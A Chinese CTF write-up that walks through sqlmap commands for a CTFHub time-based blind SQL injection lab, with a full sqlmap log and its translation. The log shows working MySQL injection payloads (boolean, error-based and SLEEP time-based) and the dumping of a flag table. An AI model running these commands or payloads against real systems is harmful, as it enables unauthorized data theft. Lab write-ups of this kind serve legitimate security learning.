CTFHub SQl注入 时间盲注(sqlmap)
0x00 简单介绍
这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap 的使用流程。
参考:sqlmap用户手册 | WooYun知识库 (xmd5.com)
sqlmap 的功能:
1、判断可注入的参数
2、判断可以用那种SQL注入技术来注入
3、识别出哪种数据库
4、根据用户选择,读取哪些数据
(具体过程可见文章末尾案例)
sqlmap支持五种不同的注入模式:
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用union的情况下的注入。
5、堆查询注入,可以同时执行多条语句的执行时的注入。
0x01 列出数据库
python sqlmap.py -u http://challenge-493b66302b18faed.sandbox.ctfhub.com:10800/?id=2 --dbs
-u:目标URL
--dbs:枚举数据库
0x02 列出目标数据库的表
遍历0x01中的所有数据库( performance_schema 用于性能分析,而 information_schema 用于存储数据库元数据(关于数据的数据),都是mysql自带的数据库,不用管)。
python sqlmap.py -u http://challenge-493b66302b18faed.sandbox.ctfhub.com:10800/?id=2 -D sqli(数据库名)
--tables
-D 指定数据库
--tables 列举该数据库中的所有表
0x03 列出目标数据库中的列
我们显然关心 flag 表。
python sqlmap.py -u http://challenge-493b66302b18faed.sandbox.ctfhub.com:10800/?id=2 -D sqli(数据库名) -T flag(表名) --columns
-T 指定表
--columns 列举该表中的所有字段
0x04 从目标表中取出数据
python sqlmap.py -u http://challenge-493b66302b18faed.sandbox.ctfhub.com:10800/?id=2 -D sqli(数据库名) -T flag(表名) -C flag(所求字段名) --dump
-C 指定字段
--dump 获取数据
以下为最后一步0x04 sqlmap中的显示内容(sql注入过程):
D:\Plug_in\sqlmap-master>python sqlmap.py -u http://challenge-4d26a8e654d68212.sandbox.ctfhub.com:10800/?id=2 -D sqli -T flag -C flag --dump
___
__H__
___ ___[,]_____ ___ ___ {1.5.8#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:24:10 /2021-08-07/
[16:24:10] [INFO] testing connection to the target URL
[16:24:10] [INFO] checking if the target is protected by some kind of WAF/IPS
[16:24:10] [INFO] testing if the target URL content is stable
[16:24:10] [INFO] target URL content is stable
[16:24:10] [INFO] testing if GET parameter 'id' is dynamic
[16:24:11] [WARNING] GET parameter 'id' does not appear to be dynamic
[16:24:11] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[16:24:11] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[16:24:11] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[16:24:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:24:22] [WARNING] reflective value(s) found and filtering out
[16:24:22] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:24:22] [INFO] testing 'Generic inline queries'
[16:24:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:24:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:24:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[16:24:28] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:24:29] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[16:24:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:24:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[16:24:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:24:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[16:24:29] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:24:29] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[16:24:29] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:24:29] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[16:24:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:24:29] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[16:24:29] [INFO] testing 'MySQL inline queries'
[16:24:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:24:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[16:24:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[16:24:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[16:24:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[16:24:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[16:24:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:24:40] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[16:24:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:24:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:24:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:24:40] [INFO] target URL appears to have 2 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[16:24:48] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[16:24:49] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[16:24:52] [INFO] testing 'MySQL UNION query (35) - 1 to 20 columns'
[16:24:54] [INFO] testing 'MySQL UNION query (35) - 21 to 40 columns'
[16:24:55] [INFO] testing 'MySQL UNION query (35) - 41 to 60 columns'
[16:24:56] [INFO] testing 'MySQL UNION query (35) - 61 to 80 columns'
[16:24:57] [INFO] testing 'MySQL UNION query (35) - 81 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 344 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=2 RLIKE (SELECT (CASE WHEN (3982=3982) THEN 2 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2 AND (SELECT 5108 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(5108=5108,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2 AND (SELECT 9417 FROM (SELECT(SLEEP(5)))rRTT)
---
[16:25:01] [INFO] the back-end DBMS is MySQL
web application technology: OpenResty 1.19.3.2, PHP 7.3.14
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[16:25:01] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'sqli'
[16:25:01] [INFO] retrieved: 'ctfhub{34e19ddc5ce73c4bea083c02}'
Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{34e19ddc5ce73c4bea083c02} |
+----------------------------------+
[16:25:01] [INFO] table 'sqli.flag' dumped to CSV file 'C:\Users\86187\AppData\Local\sqlmap\output\challenge-4d26a8e654d68212.sandbox.ctfhub.com\dump\sqli\flag.csv'
[16:25:01] [INFO] fetched data logged to text files under 'C:\Users\86187\AppData\Local\sqlmap\output\challenge-4d26a8e654d68212.sandbox.ctfhub.com'
[*] ending @ 16:25:01 /2021-08-07/
翻译:
D:\Plug_in\sqlmap-master>python sqlmap.py -u http://challenge-4d26a8e654d68212.sandbox.ctfhub.com:10800/?id=2 -D sqli -T flag -C flag --dump
___
__H__
___ ___[,]____ ___ ___ {1.5.8#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] 法律免责声明:在未经双方事先同意的情况下使用 sqlmap 攻击目标是非法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不承担任何责任,也不对本程序造成的任何误用或损坏负责
[*] 开始 @ 16:24:10 /2021-08-07/
[16:24:10] [INFO] 测试与目标 URL 的连接
[16:24:10] [INFO] 检查目标是否受某种 WAF/IPS 保护
[16:24:10] [INFO] 测试目标 URL 内容是否稳定
[16:24:10] [INFO] 目标 URL 内容稳定
[16:24:10] [INFO] 测试 GET 参数“id”是否是动态的
[16:24:11] [警告] GET 参数“id”似乎不是动态的
[16:24:11] [INFO] 启发式(基本)测试表明 GET 参数“id”可能是可注入的(可能的 DBMS:“MySQL”)
[16:24:11] [INFO] 启发式 (XSS) 测试表明 GET 参数“id”可能容易受到跨站点脚本 (XSS) 攻击
[16:24:11] [INFO] 在 GET 参数“id”上测试 SQL 注入
看起来后端 DBMS 是“MySQL”。您想跳过特定于其他 DBMS 的测试负载吗? [是/否] 是
对于剩余的测试,您是否要包括扩展提供的级别 (1) 和风险 (1) 值的“MySQL”的所有测试? [是/否] 是
[16:24:22] [INFO] 测试“AND 布尔型盲 - WHERE 或 HAVING 子句”
[16:24:22] [警告] 发现反射值并过滤掉
[16:24:22] [INFO] 测试“基于布尔值的盲注 - 参数替换(原始值)”
[16:24:22] [INFO] 测试“通用内联查询”
[16:24:22] [INFO] 测试“AND 布尔型盲 - WHERE 或 HAVING 子句(MySQL 注释)”
[16:24:24] [INFO] 测试“或基于布尔值的盲注 - WHERE 或 HAVING 子句(MySQL 注释)”
[16:24:26] [信息] 测试“或基于布尔值的盲注 - WHERE 或 HAVING 子句(不是 - MySQL 注释)”
[16:24:28] [信息] 测试“基于 MySQL RLIKE 布尔值的盲注 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句”
[16:24:29] [INFO] GET 参数“id”似乎是“MySQL RLIKE 基于布尔值的盲注 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句”可注入
[16:24:29] [信息] 测试“MySQL >= 5.5 AND 基于错误 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句(BIGINT UNSIGNED)”
[16:24:29] [信息] 测试“MySQL >= 5.5 OR 基于错误 - WHERE 或 HAVING 子句(BIGINT UNSIGNED)”
[16:24:29] [信息] 测试“MySQL >= 5.5 AND 基于错误 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句 (EXP)”
[16:24:29] [信息] 测试“MySQL >= 5.5 OR 基于错误 - WHERE 或 HAVING 子句(EXP)”
[16:24:29] [信息] 测试“MySQL >= 5.6 AND 基于错误 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句(GTID_SUBSET)”
[16:24:29] [信息] 测试“MySQL >= 5.6 OR 基于错误 - WHERE 或 HAVING 子句(GTID_SUBSET)”
[16:24:29] [信息] 测试“MySQL >= 5.7.8 AND 基于错误 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句(JSON_KEYS)”
[16:24:29] [INFO] 测试“MySQL >= 5.7.8 OR 基于错误 - WHERE 或 HAVING 子句(JSON_KEYS)”
[16:24:29] [信息] 测试“MySQL >= 5.0 AND 基于错误 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句(FLOOR)”
[16:24:29] [INFO] GET 参数“id”是“MySQL >= 5.0 AND 基于错误 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句(FLOOR)”可注入
[16:24:29] [INFO] 测试“MySQL 内联查询”
[16:24:29] [INFO] 测试“MySQL >= 5.0.12 堆叠查询(评论)”
[16:24:29] [信息] 测试“MySQL >= 5.0.12 堆叠查询”
[16:24:29] [INFO] 测试“MySQL >= 5.0.12 堆叠查询(查询 SLEEP - 评论)”
[16:24:29] [INFO] 测试“MySQL >= 5.0.12 堆叠查询(查询 SLEEP)”
[16:24:29] [INFO] 测试“MySQL < 5.0.12 堆叠查询(重查询 - 评论)”
[16:24:29] [INFO] 测试“MySQL < 5.0.12 堆叠查询(重查询)”
[16:24:30] [INFO] 测试“MySQL >= 5.0.12 AND 基于时间的盲(查询 SLEEP)”
[16:24:40] [INFO] GET 参数“id”似乎是“MySQL >= 5.0.12 AND 基于时间的盲注(查询 SLEEP)”可注入
[16:24:40] [INFO] 测试“通用联合查询 (NULL) - 1 到 20 列”
[16:24:40] [INFO] 自动扩展 UNION 查询注入技术测试的范围,因为至少发现了一种其他(潜在)技术
[16:24:40] [INFO] 'ORDER BY' 技术似乎是可用的。这应该会减少查找正确数量的查询列所需的时间。自动扩展当前UNION查询注入技术测试的范围
[16:24:40] [INFO] 目标 URL 在查询中似乎有 2 列
您想(重新)尝试通过模糊测试找到合适的 UNION 列类型吗? [是/否] 是
注入不可利用 NULL 值。您想尝试使用随机整数值作为选项“--union-char”吗? [是/否] 是
[16:24:48] [警告] 如果未检测到基于 UNION 的 SQL 注入,请考虑强制后端 DBMS(例如'--dbms=mysql')
[16:24:49] [信息] t参数 URL 似乎是可注入 2 列的 UNION
注入不可利用 NULL 值。您想尝试使用随机整数值作为选项“--union-char”吗? [是/否] 是
[16:24:52] [INFO] 测试“MySQL UNION 查询 (35) - 1 到 20 列”
[16:24:54] [INFO] 测试“MySQL UNION 查询 (35) - 21 到 40 列”
[16:24:55] [INFO] 测试“MySQL UNION 查询 (35) - 41 到 60 列”
[16:24:56] [INFO] 测试“MySQL UNION 查询 (35) - 61 到 80 列”
[16:24:57] [INFO] 测试“MySQL UNION 查询 (35) - 81 到 100 列”
GET 参数“id”易受攻击。你想继续测试其他人(如果有的话)吗? [是/否] 是
sqlmap 确定了以下注入点,总共有 344 个 HTTP(s) 请求:
---
参数:id (GET)
类型:基于布尔值的盲注
标题:MySQL RLIKE 基于布尔值的盲注 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句
有效负载:id=2 RLIKE (SELECT (CASE WHEN (3982=3982) THEN 2 ELSE 0x28 END))
类型:基于错误
标题:MySQL >= 5.0 AND 基于错误 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句 (FLOOR)
有效负载:id=2 AND (SELECT 5108 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(5108=5108,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA .PLUGINS GROUP BY x)a)
类型:基于时间的盲注
标题:MySQL >= 5.0.12 AND 基于时间的盲(查询 SLEEP)
有效负载:id=2 AND (SELECT 9417 FROM (SELECT(SLEEP(5)))rRTT)
---
[16:25:01] [INFO] 后端 DBMS 是 MySQL
网络应用技术:OpenResty 1.19.3.2、PHP 7.3.14
后端 DBMS:MySQL >= 5.0(MariaDB fork)
[16:25:01] [INFO] 为数据库 'sqli' 中的表 'flag' 获取列 'flag' 的条目
[16:25:01] [信息] 检索:'ctfhub{34e19ddc5ce73c4bea083c02}'
数据库:sql
表:标志
[1 个条目]
+---------------------------------+
|标志|
+---------------------------------+
| ctfhub{34e19ddc5ce73c4bea083c02} |
+---------------------------------+
[16:25:01] [INFO] 表 'sqli.flag' 转储到 CSV 文件 'C:\Users\86187\AppData\Local\sqlmap\output\challenge-4d26a8e654d68212.sandbox.ctfhub.com\dump\sqli\标志.csv'
[16:25:01] [INFO] 获取记录到“C:\Users\86187\AppData\Local\sqlmap\output\challenge-4d26a8e654d68212.sandbox.ctfhub.com”下的文本文件的数据
[*] 结束 @ 16:25:01 /2021-08-07/